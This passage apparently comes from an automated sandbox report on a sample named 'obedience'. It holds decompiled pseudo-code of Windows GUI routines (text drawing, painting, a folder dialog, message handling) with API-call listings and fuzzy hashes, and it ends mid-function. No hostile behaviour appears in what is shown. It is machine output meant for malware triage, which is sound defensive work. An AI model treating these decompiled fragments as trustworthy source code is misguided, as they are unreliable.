      0x00454de8
      0x00454de8
      0x00454df4
      0x00454dfc
      0x00454e22
      0x00454e2a
      0x00454e2f
      0x00454e6d
      0x00454e72
      0x00454e76
      0x00454e7b
      0x00454e87
      0x00454e8f
      0x00454e8f
      0x00454e94
      0x00454e98
      0x00454f35
      0x00454f3d
      0x00454f46
      0x00454f55
      0x00454f5a
      0x00454f5c
      0x00454f5f
      0x00454f62
      0x00454f6f
      0x00454e9e
      0x00454e9e
      0x00454ea2
      0x00454eac
      0x00454ebc
      0x00454ec9
      0x00454ed2
      0x00454ee1
      0x00454eee
      0x00454eee
      0x00454ef3
      0x00454ef7
      0x00454f25
      0x00454f30
      0x00454ef9
      0x00454efe
      0x00454f0a
      0x00454f0f
      0x00454f11
      0x00000000
      0x00000000
      0x00454f1e
      0x00454f1e
      0x00000000
      0x00454ef7
      0x00454e98
      0x00454e34
      0x00454e42
      0x00454e43
      0x00454e44
      0x00454e45
      0x00454e46
      0x00454e5b
      0x00454e5b
      0x00000000
      0x00454dfe
      0x00454e02
      0x00454e15
      0x00454e1d
      0x00000000
      0x00454e1d
      0x00454e0a
      0x00000000
      0x00000000
      0x00454e0f
      0x00454e13
      0x00000000
      0x00000000
      0x00000000
      0x00454e13

      APIs
      • DrawEdge.USER32(00000000,?,00000006,00000002), ref: 00454E5B
      • OffsetRect.USER32(?,00000001,00000001), ref: 00454EAC
      • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 00454EE1
      • OffsetRect.USER32(?,000000FF,000000FF), ref: 00454EEE
      • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 00454F55
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Draw$OffsetRectText$Edge
      • String ID:
      • API String ID: 3610532707-0
      • Opcode ID: 745855b0b0b7b087fa45bddbec14b5f9f56833dc7bd2a4568fd4ae27f4a87528
      • Instruction ID: e3a3b80ac8318014a933cb06442803981c88269cf628af39e922d01de25676b1
      • Opcode Fuzzy Hash: 745855b0b0b7b087fa45bddbec14b5f9f56833dc7bd2a4568fd4ae27f4a87528
      • Instruction Fuzzy Hash: 3C517F70A04204AFDB11EBA9DC82B9E77E5AF84319F55816AFD14EB382C73CAD44871D
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 92%
      			E00442288(intOrPtr __eax, void* __ecx, intOrPtr _a4) {
      				char _v5;
      				char _v12;
      				intOrPtr _v16;
      				intOrPtr _v20;
      				struct HWND__* _v24;
      				intOrPtr _v28;
      				char _v32;
      				struct tagRECT _v48;
      				struct tagRECT _v64;
      				struct HWND__* _t53;
      				intOrPtr _t55;
      				intOrPtr _t60;
      				intOrPtr _t65;
      				intOrPtr _t78;
      				intOrPtr _t84;
      				intOrPtr _t86;
      				intOrPtr _t93;
      				intOrPtr _t98;
      				intOrPtr _t101;
      				void* _t102;
      				intOrPtr* _t104;
      				intOrPtr _t106;
      				intOrPtr _t110;
      				intOrPtr _t112;
      				struct HWND__* _t113;
      				intOrPtr _t114;
      				intOrPtr _t116;
      				intOrPtr _t117;
      
      				_t102 = __ecx;
      				_t101 = __eax;
      				_v5 = 1;
      				_t113 = E004426D8(_a4 + 0xfffffff7);
      				_v24 = _t113;
      				_t53 = GetWindow(_t113, 4);
      				_t104 =  *0x48f840; // 0x490b7c
      				_t4 =  *_t104 + 0x30; // 0xe036e
      				if(_t53 ==  *_t4) {
      					L6:
      					if(_v24 == 0) {
      						L25:
      						return _v5;
      					}
      					_t114 = _t101;
      					while(1) {
      						_t55 =  *((intOrPtr*)(_t114 + 0x30));
      						if(_t55 == 0) {
      							break;
      						}
      						_t114 = _t55;
      					}
      					_t112 = E0044B158(_t114);
      					_v28 = _t112;
      					if(_t112 == _v24) {
      						goto L25;
      					}
      					_t13 = _a4 - 0x10; // 0xe87d83e8
      					_t60 =  *((intOrPtr*)( *_t13 + 0x30));
      					if(_t60 == 0) {
      						_t19 = _a4 - 0x10; // 0xe87d83e8
      						_t106 =  *0x4406ec; // 0x440738
      						__eflags = E00403D88( *_t19, _t106);
      						if(__eflags == 0) {
      							__eflags = 0;
      							_v32 = 0;
      						} else {
      							_t21 = _a4 - 0x10; // 0xe87d83e8
      							_v32 = E0044B158( *_t21);
      						}
      						L19:
      						_v12 = 0;
      						_t65 = _a4;
      						_v20 =  *((intOrPtr*)(_t65 - 9));
      						_v16 =  *((intOrPtr*)(_t65 - 5));
      						_push( &_v32);
      						_push(E0044221C);
      						_push(GetCurrentThreadId());
      						L004075E8();
      						_t126 = _v12;
      						if(_v12 == 0) {
      							goto L25;
      						}
      						GetWindowRect(_v24,  &_v48);
      						_push(_a4 + 0xfffffff7);
      						_push(_a4 - 1);
      						E00403DF8(_t101, _t126);
      						_t78 =  *0x490afc; // 0x0
      						_t110 =  *0x43f2cc; // 0x43f318
      						if(E00403D88(_t78, _t110) == 0) {
      							L23:
      							if(IntersectRect( &_v48,  &_v48,  &_v64) != 0) {
      								_v5 = 0;
      							}
      							goto L25;
      						}
      						_t84 =  *0x490afc; // 0x0
      						if( *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x38)) + 0xa0)) == 0) {
      							goto L23;
      						}
      						_t86 =  *0x490afc; // 0x0
      						if(E0044B158( *((intOrPtr*)( *((intOrPtr*)(_t86 + 0x38)) + 0xa0))) == _v24) {
      							goto L25;
      						}
      						goto L23;
      					}
      					_t116 = _t60;
      					while(1) {
      						_t93 =  *((intOrPtr*)(_t116 + 0x30));
      						if(_t93 == 0) {
      							break;
      						}
      						_t116 = _t93;
      					}
      					_v32 = E0044B158(_t116);
      					goto L19;
      				}
      				_t117 = E004417EC(_v24, _t102);
      				if(_t117 == 0) {
      					goto L25;
      				} else {
      					while(1) {
      						_t98 =  *((intOrPtr*)(_t117 + 0x30));
      						if(_t98 == 0) {
      							break;
      						}
      						_t117 = _t98;
      					}
      					_v24 = E0044B158(_t117);
      					goto L6;
      				}
      			}

      Addresses (one per line of the C-Code body above, in order):

      APIs
        • Part of subcall function 004426D8: WindowFromPoint.USER32(004424B2,00490B20,00000000,004422A2,?,-0000000C,?), ref: 004426DE
        • Part of subcall function 004426D8: GetParent.USER32(00000000), ref: 004426F5
      • GetWindow.USER32(00000000,00000004), ref: 004422AA
      • GetCurrentThreadId.KERNEL32 ref: 0044237E
      • 73BEAC10.USER32(00000000,0044221C,?,00000000,00000004,?,-0000000C,?), ref: 00442384
      • GetWindowRect.USER32 ref: 0044239B
      • IntersectRect.USER32 ref: 00442409
        • Part of subcall function 004417EC: GetWindowThreadProcessId.USER32(00000000), ref: 004417F9
        • Part of subcall function 004417EC: GetCurrentProcessId.KERNEL32(?,?,00000000,004642DF,?,?,?,00000001,0046444B,?,?,?,?), ref: 00441802
        • Part of subcall function 004417EC: GlobalFindAtomA.KERNEL32(00000000), ref: 00441817
        • Part of subcall function 004417EC: GetPropA.USER32 ref: 0044182E
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Window$CurrentProcessRectThread$AtomFindFromGlobalIntersectParentPointProp
      • String ID:
      • API String ID: 2049660638-0
      • Opcode ID: 7a7150ef0b02eb1c7e1b9154a03154701819972f8cd37f5e953f0173e9b18a56
      • Instruction ID: b703b679258e754295be31fcfbe001b4db9563f6bbfcf5fbc2c40f1deda06563
      • Opcode Fuzzy Hash: 7a7150ef0b02eb1c7e1b9154a03154701819972f8cd37f5e953f0173e9b18a56
      • Instruction Fuzzy Hash: 07516D35A002099FDB10DFA9C984AAEB7F4BF04354F948166F814EB351D778EE41CB99
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 37%
      			E004871F8(void* __eax, void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi) {
      				intOrPtr* _v8;
      				char _v9;
      				intOrPtr _v16;
      				intOrPtr _v20;
      				int _v24;
      				char _v28;
      				struct _ITEMIDLIST* _v32;
      				void* _v36;
      				void* _v40;
      				char _v44;
      				char _v48;
      				intOrPtr _v56;
      				intOrPtr _v60;
      				int _v64;
      				intOrPtr _v68;
      				intOrPtr _v72;
      				intOrPtr _v76;
      				struct _browseinfo _v80;
      				char* _t48;
      				intOrPtr* _t54;
      				intOrPtr* _t61;
      				intOrPtr* _t89;
      				intOrPtr* _t92;
      				void* _t99;
      				intOrPtr _t108;
      				intOrPtr _t110;
      				void* _t111;
      				void* _t113;
      				void* _t115;
      				void* _t116;
      				intOrPtr _t117;
      
      				_t111 = __edi;
      				_t115 = _t116;
      				_t117 = _t116 + 0xffffffb4;
      				_push(__ebx);
      				_push(__esi);
      				_v36 = 0;
      				_v40 = 0;
      				_v8 = __ecx;
      				_t99 = __edx;
      				_t113 = __eax;
      				_push(_t115);
      				_push(0x4873d0);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t117;
      				_v9 = 0;
      				if(E004873E0() == 0) {
      					E00404A40(_v8);
      				}
      				E00403498( &_v80, 0x20);
      				_t48 =  &_v36;
      				_push(_t48);
      				L00438F4C();
      				if(_t48 != 0 || _v36 == 0) {
      					_pop(_t108);
      					 *[fs:eax] = _t108;
      					_push(0x4873d7);
      					E00406578( &_v40);
      					return E00406578( &_v36);
      				} else {
      					_t54 = _v36;
      					_v20 =  *((intOrPtr*)( *_t54 + 0xc))(_t54, 0x104);
      					_push(_t115);
      					_push(0x4873ab);
      					_push( *[fs:eax]);
      					 *[fs:eax] = _t117;
      					_v28 = 0;
      					E004053B8(_t99, 0);
      					if(0 != 0) {
      						L00438F44();
      						_t89 =  *0x48f840; // 0x490b7c
      						_t18 =  *_t89 + 0x30; // 0xe036e
      						_t92 = _v40;
      						 *((intOrPtr*)( *_t92 + 0xc))(_t92,  *_t18, 0, E004052F4(_t99),  &_v44,  &_v28,  &_v48,  &_v40);
      					}
      					_t61 =  *0x48f840; // 0x490b7c
      					_t21 =  *_t61 + 0x30; // 0xe036e
      					_v80 =  *_t21;
      					_v76 = _v28;
      					_v72 = _v20;
      					_v68 = E00404F00(_t113);
      					_v64 = 1;
      					if( *_v8 != 0) {
      						_v60 = E004871D0;
      						_v56 = E00404F00( *_v8);
      					}
      					_v16 = E0045B38C(0, _t99, _t111, _t113);
      					_v24 = SetErrorMode(1);
      					_push(_t115);
      					_push(0x487356);
      					_push( *[fs:eax]);
      					 *[fs:eax] = _t117;
      					_v32 = SHBrowseForFolder( &_v80);
      					_pop(_t110);
      					 *[fs:eax] = _t110;
      					_push(0x48735d);
      					SetErrorMode(_v24);
      					return E0045B440(_v16);
      				}
      			}

      APIs
      • SHGetMalloc.SHELL32(?), ref: 0048724A
      • SHGetDesktopFolder.SHELL32(?,00000000,004873AB), ref: 00487294
      • SetErrorMode.KERNEL32(00000001,00000000,004873AB), ref: 00487315
      • SHBrowseForFolder.SHELL32(?), ref: 0048732F
      • SetErrorMode.KERNEL32(?,0048735D,00000001,00000000,004873AB), ref: 00487348
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: ErrorFolderMode$BrowseDesktopMalloc
      • String ID:
      • API String ID: 2427564971-0
      • Opcode ID: 2b67dbea790061ee53a7be6d924863f33e9f171dee3ed7cbe071363d62f7697c
      • Instruction ID: e067cca859c7af789acb35b75da99220a2e24c66894820c7be7da08dd8a7be52
      • Opcode Fuzzy Hash: 2b67dbea790061ee53a7be6d924863f33e9f171dee3ed7cbe071363d62f7697c
      • Instruction Fuzzy Hash: FD411971E042089FDB00EFA9D891A9EBBF8EB09304F61447AF904E7651D778AD04DB69
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 77%
      			E00434EEC(intOrPtr* __eax, void* __ebx, signed int __ecx, struct tagRECT* __edx, void* __edi, void* __esi) {
      				char _v8;
      				int _t40;
      				CHAR* _t42;
      				int _t54;
      				CHAR* _t56;
      				int _t65;
      				CHAR* _t67;
      				intOrPtr* _t76;
      				intOrPtr _t86;
      				struct tagRECT* _t91;
      				signed int _t93;
      				int _t94;
      				intOrPtr _t97;
      				signed int _t104;
      
      				_push(0);
      				_t93 = __ecx;
      				_t91 = __edx;
      				_t76 = __eax;
      				_push(_t97);
      				_push(0x435042);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t97;
      				 *((intOrPtr*)( *__eax + 0x90))();
      				if((__ecx & 0x00000400) != 0 && (_v8 == 0 ||  *((char*)(__eax + 0x170)) != 0 &&  *_v8 == 0x26 &&  *((char*)(_v8 + 1)) == 0)) {
      					E00404D08( &_v8, 0x435058);
      				}
      				if( *((char*)(_t76 + 0x170)) == 0) {
      					_t104 = _t93;
      				}
      				_t94 = E00446C1C(_t76, _t93, _t104);
      				E00426A20( *((intOrPtr*)(_t76 + 0x160)));
      				if( *((intOrPtr*)( *_t76 + 0x50))() != 0) {
      					_t40 = E00404D00(_v8);
      					_t42 = E00404F00(_v8);
      					DrawTextA(E00426B00( *((intOrPtr*)(_t76 + 0x160))), _t42, _t40, _t91, _t94);
      				} else {
      					OffsetRect(_t91, 1, 1);
      					E00425B2C( *((intOrPtr*)( *((intOrPtr*)(_t76 + 0x160)) + 0xc)), 0xff000014);
      					_t54 = E00404D00(_v8);
      					_t56 = E00404F00(_v8);
      					DrawTextA(E00426B00( *((intOrPtr*)(_t76 + 0x160))), _t56, _t54, _t91, _t94);
      					OffsetRect(_t91, 0xffffffff, 0xffffffff);
      					E00425B2C( *((intOrPtr*)( *((intOrPtr*)(_t76 + 0x160)) + 0xc)), 0xff000010);
      					_t65 = E00404D00(_v8);
      					_t67 = E00404F00(_v8);
      					DrawTextA(E00426B00( *((intOrPtr*)(_t76 + 0x160))), _t67, _t65, _t91, _t94);
      				}
      				_pop(_t86);
      				 *[fs:eax] = _t86;
      				_push(0x435049);
      				return E00404A40( &_v8);
      			}

      APIs
      • OffsetRect.USER32(?,00000001,00000001), ref: 00434F86
      • DrawTextA.USER32(00000000,00000000,00000000,?,00000000), ref: 00434FBE
      • OffsetRect.USER32(?,000000FF,000000FF), ref: 00434FC8
      • DrawTextA.USER32(00000000,00000000,00000000,?,00000000), ref: 00435000
      • DrawTextA.USER32(00000000,00000000,00000000,?,00000000), ref: 00435027
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: DrawText$OffsetRect
      • String ID:
      • API String ID: 1886049697-0
      • Opcode ID: ef1bdd8e4b321292d833d8a42ee2ebca4ab1f53c59a00ae5bf15d2d658e5372c
      • Instruction ID: d2490cd737bc36ce459315cec5c337c25ab01d7ef10b572567b8544b30e48f81
      • Opcode Fuzzy Hash: ef1bdd8e4b321292d833d8a42ee2ebca4ab1f53c59a00ae5bf15d2d658e5372c
      • Instruction Fuzzy Hash: 43316970A04104AFDB11EB69DC85F9F77A8EF89314F6541B6B404E7396CA79AD00C668
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 85%
      			E00448DE4(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
      				intOrPtr* _v8;
      				intOrPtr _v12;
      				int _v16;
      				int _v20;
      				struct tagPAINTSTRUCT _v84;
      				intOrPtr _t55;
      				void* _t64;
      				struct HDC__* _t75;
      				void* _t76;
      				intOrPtr _t85;
      				void* _t96;
      				void* _t97;
      				void* _t99;
      				void* _t101;
      				void* _t102;
      				intOrPtr _t103;
      
      				_t101 = _t102;
      				_t103 = _t102 + 0xffffffb0;
      				_v12 = __edx;
      				_v8 = __eax;
      				_t75 =  *(_v12 + 4);
      				if(_t75 == 0) {
      					_t75 = BeginPaint(E0044B158(_v8),  &_v84);
      				}
      				_push(_t101);
      				_push(0x448f04);
      				_push( *[fs:edx]);
      				 *[fs:edx] = _t103;
      				if( *((intOrPtr*)(_v8 + 0x198)) != 0) {
      					_v20 = SaveDC(_t75);
      					_v16 = 2;
      					_t96 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x198)) + 8)) - 1;
      					if(_t96 >= 0) {
      						_t97 = _t96 + 1;
      						_t99 = 0;
      						do {
      							_t64 = E00419C84( *((intOrPtr*)(_v8 + 0x198)), _t76, _t99);
      							if( *((char*)(_t64 + 0x57)) != 0 || ( *(_t64 + 0x1c) & 0x00000010) != 0 && ( *(_t64 + 0x51) & 0x00000004) == 0) {
      								if(( *(_t64 + 0x50) & 0x00000040) == 0) {
      									goto L11;
      								} else {
      									_v16 = ExcludeClipRect(_t75,  *(_t64 + 0x40),  *(_t64 + 0x44),  *(_t64 + 0x40) +  *((intOrPtr*)(_t64 + 0x48)),  *(_t64 + 0x44) +  *((intOrPtr*)(_t64 + 0x4c)));
      									if(_v16 != 1) {
      										goto L11;
      									}
      								}
      							} else {
      								goto L11;
      							}
      							goto L12;
      							L11:
      							_t99 = _t99 + 1;
      							_t97 = _t97 - 1;
      						} while (_t97 != 0);
      					}
      					L12:
      					if(_v16 != 1) {
      						 *((intOrPtr*)( *_v8 + 0xb8))();
      					}
      					RestoreDC(_t75, _v20);
      				} else {
      					 *((intOrPtr*)( *_v8 + 0xb8))();
      				}
      				E00448F3C(_v8, 0, _t75);
      				_pop(_t85);
      				 *[fs:eax] = _t85;
      				_push(0x448f0b);
      				_t55 = _v12;
      				if( *((intOrPtr*)(_t55 + 4)) == 0) {
      					return EndPaint(E0044B158(_v8),  &_v84);
      				}
      				return _t55;
      			}

      APIs
      • BeginPaint.USER32(00000000,?), ref: 00448E0A
      • SaveDC.GDI32(?), ref: 00448E3E
      • ExcludeClipRect.GDI32(?,?,?,?,?,00000000,00448F04), ref: 00448EA0
      • RestoreDC.GDI32(?,?), ref: 00448ECA
      • EndPaint.USER32(00000000,?,00448F0B), ref: 00448EFE
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Paint$BeginClipExcludeRectRestoreSave
      • String ID:
      • API String ID: 3808407030-0
      • Opcode ID: 020c9d7ffcdd9e2b5038337da80e0f03f62c0b5d0891f93bf1a1afd5109ac8ba
      • Instruction ID: 48f513e9495aa45a6b0e8934a38842617bd31a5612fecb18929df95e2f29eeb7
      • Opcode Fuzzy Hash: 020c9d7ffcdd9e2b5038337da80e0f03f62c0b5d0891f93bf1a1afd5109ac8ba
      • Instruction Fuzzy Hash: FF414D70A00204AFDB10DF99C884E9EB7F9AF48704F2584AEE904D7366DB39AD45CB54
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 82%
      			E0041C700(void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, void* _a4, signed short _a8) {
      				char _v5;
      				char _v12;
      				char _v16;
      				char _v20;
      				char _v24;
      				char _v28;
      				char _v32;
      				char _v36;
      				char _v40;
      				void* _t29;
      				void* _t62;
      				void* _t63;
      				intOrPtr _t67;
      				intOrPtr _t69;
      				char _t70;
      				intOrPtr _t73;
      				void* _t86;
      				void* _t88;
      				void* _t89;
      				intOrPtr _t90;
      
      				_t70 = __edx;
      				_t63 = __ecx;
      				_t88 = _t89;
      				_t90 = _t89 + 0xffffffdc;
      				_v36 = 0;
      				_v40 = 0;
      				_v28 = 0;
      				_v32 = 0;
      				if(__edx != 0) {
      					_t90 = _t90 + 0xfffffff0;
      					_t29 = E00403F68(_t29, _t88);
      				}
      				_t86 = _t63;
      				_v5 = _t70;
      				_t62 = _t29;
      				_t84 = _a8;
      				_push(_t88);
      				_push(0x41c829);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t90;
      				if(_a8 != 0xffff) {
      					E0041C5F8(E0040967C(_t86, _t84 & 0x0000ffff), 0);
      					if( *((intOrPtr*)(_t62 + 4)) < 0) {
      						E00409988(_t86,  &_v36);
      						_v24 = _v36;
      						_v20 = 0xb;
      						E0040C3D4(GetLastError(),  &_v40);
      						_v16 = _v40;
      						_v12 = 0xb;
      						_t67 =  *0x48f52c; // 0x415d38
      						E0040CCE4(_t62, _t67, 1, _t84, _t86, 1,  &_v24);
      						E004043D0();
      					}
      				} else {
      					E0041C5F8(E004096F8(), 0);
      					if( *((intOrPtr*)(_t62 + 4)) < 0) {
      						E00409988(_t86,  &_v28);
      						_v24 = _v28;
      						_v20 = 0xb;
      						E0040C3D4(GetLastError(),  &_v32);
      						_v16 = _v32;
      						_v12 = 0xb;
      						_t69 =  *0x48f9d8; // 0x415d30
      						E0040CCE4(_t62, _t69, 1, _t84, _t86, 1,  &_v24);
      						E004043D0();
      					}
      				}
      				_pop(_t73);
      				 *[fs:eax] = _t73;
      				_push(E0041C830);
      				return E00404A64( &_v40, 4);
      			}

      APIs
      • GetLastError.KERNEL32(00000000,0041C829,?,?,00417C74,00000001), ref: 0041C775
        • Part of subcall function 0040967C: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,00417C74,0041C7B5,00000000,0041C829,?,?,00417C74), ref: 004096CA
        • Part of subcall function 00409988: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,00417C74,0041C7D0,00000000,0041C829,?,?,00417C74,00000001), ref: 004099A7
      • GetLastError.KERNEL32(00000000,0041C829,?,?,00417C74,00000001), ref: 0041C7DA
        • Part of subcall function 0040C3D4: FormatMessageA.KERNEL32(00003200,00000000,00000000,00000000,?,00000100,00000000,00000000,0040E24E,00000000,0040E2A8), ref: 0040C3F3
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: ErrorLast$CreateFileFormatFullMessageNamePath
      • String ID: 0]A$8]A$toA
      • API String ID: 1652710734-1791751054
      • Opcode ID: a7813c119f33920a09d2efcb335686bb1fe20de70dcddbfc23b9cde6ab463027
      • Instruction ID: e6f533b28651a76b36b8ca087b3115b0fddf3e8d0f29a2853d18baa0149197ef
      • Opcode Fuzzy Hash: a7813c119f33920a09d2efcb335686bb1fe20de70dcddbfc23b9cde6ab463027
      • Instruction Fuzzy Hash: D7314070A042059FDB00EFAAC8816DEB7F5AB49314F50857AE804F7381D7795D458BA9
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 76%
      			E00435F10(void* __eax, void* __ebx, intOrPtr __ecx, int __edx, void* __edi, void* __esi) {
      				intOrPtr _v8;
      				char _v12;
      				long _t27;
      				long _t34;
      				int _t42;
      				int _t43;
      				intOrPtr _t50;
      				int _t54;
      				void* _t57;
      				void* _t60;
      
      				_v12 = 0;
      				_v8 = __ecx;
      				_t54 = __edx;
      				_t57 = __eax;
      				_push(_t60);
      				_push(0x435ffb);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t60 + 0xfffffff8;
      				if(__edx >= 0) {
      					_t42 = SendMessageA(E0044B158( *((intOrPtr*)(__eax + 0x10))), 0xbb, __edx, 0);
      					if(_t42 < 0) {
      						_t43 = SendMessageA(E0044B158( *((intOrPtr*)(_t57 + 0x10))), 0xbb, _t54 - 1, 0);
      						if(_t43 >= 0) {
      							_t27 = SendMessageA(E0044B158( *((intOrPtr*)(_t57 + 0x10))), 0xc1, _t43, 0);
      							if(_t27 != 0) {
      								_t42 = _t43 + _t27;
      								E00404D4C( &_v12, _v8, 0x436014);
      								goto L6;
      							}
      						}
      					} else {
      						E00404D4C( &_v12, 0x436014, _v8);
      						L6:
      						SendMessageA(E0044B158( *((intOrPtr*)(_t57 + 0x10))), 0xb1, _t42, _t42);
      						_t34 = E00404F00(_v12);
      						SendMessageA(E0044B158( *((intOrPtr*)(_t57 + 0x10))), 0xc2, 0, _t34);
      					}
      				}
      				_pop(_t50);
      				 *[fs:eax] = _t50;
      				_push(0x436002);
      				return E00404A40( &_v12);
      			}

      APIs
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: MessageSend
      • String ID:
      • API String ID: 3850602802-0
      • Opcode ID: 9e6577b5db2e91a70072632bf5935b72bfb24d59dcac6a6ba5ae8583d1ee9809
      • Instruction ID: 68da375012344e4d9b8b7edda4ef64647927641f7b8bf6a44e6f2e66def988c5
      • Opcode Fuzzy Hash: 9e6577b5db2e91a70072632bf5935b72bfb24d59dcac6a6ba5ae8583d1ee9809
      • Instruction Fuzzy Hash: D7217170A447046BE720FBA6CC96F5F77B8EB84704F50883A7600A76C1DB78ED048669
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E00464288(void* __eax, void* __ecx, struct HWND__** __edx) {
      				intOrPtr _t11;
      				intOrPtr _t20;
      				void* _t30;
      				void* _t31;
      				void* _t33;
      				struct HWND__** _t34;
      				struct HWND__* _t35;
      				struct HWND__* _t36;
      
      				_t31 = __ecx;
      				_t34 = __edx;
      				_t33 = __eax;
      				_t30 = 0;
      				_t11 =  *((intOrPtr*)(__edx + 4));
      				if(_t11 < 0x100 || _t11 > 0x108) {
      					L16:
      					return _t30;
      				} else {
      					_t35 = GetCapture();
      					if(_t35 != 0) {
      						if(GetWindowLongA(_t35, 0xfffffffa) ==  *0x490664 && SendMessageA(_t35, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
      							_t30 = 1;
      						}
      						goto L16;
      					}
      					_t36 =  *_t34;
      					_t20 =  *((intOrPtr*)(_t33 + 0x44));
      					if(_t20 == 0 || _t36 !=  *((intOrPtr*)(_t20 + 0x254))) {
      						L7:
      						if(E004417EC(_t36, _t31) == 0 && _t36 != 0) {
      							_t36 = GetParent(_t36);
      							goto L7;
      						}
      						if(_t36 == 0) {
      							_t36 =  *_t34;
      						}
      						goto L11;
      					} else {
      						_t36 = E0044B158(_t20);
      						L11:
      						if(SendMessageA(_t36, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
      							_t30 = 1;
      						}
      						goto L16;
      					}
      				}
      			}

      APIs
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: MessageSend$CaptureLongWindow
      • String ID:
      • API String ID: 1158686931-0
      • Opcode ID: abc1d7aa98873f61f31f0c32c8acddfb31a1a65e2eb05e989299b2359190fbc9
      • Instruction ID: 9784f6399ca2f31a262f42a6aa994aa0f0fe5810ed2db42d249e98e557581eba
      • Opcode Fuzzy Hash: abc1d7aa98873f61f31f0c32c8acddfb31a1a65e2eb05e989299b2359190fbc9
      • Instruction Fuzzy Hash: 24114975304609DFAA60BE9A8980A2773DC9F94354B20457BF959D3382FA28FC40836E
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 22%
      			E0044CB24(void* __eax, void* __ecx) {
      				intOrPtr _v8;
      				intOrPtr _v12;
      				char _v16;
      				intOrPtr* _t14;
      				intOrPtr* _t17;
      				intOrPtr _t19;
      				intOrPtr* _t21;
      				intOrPtr* _t26;
      				intOrPtr _t37;
      				void* _t39;
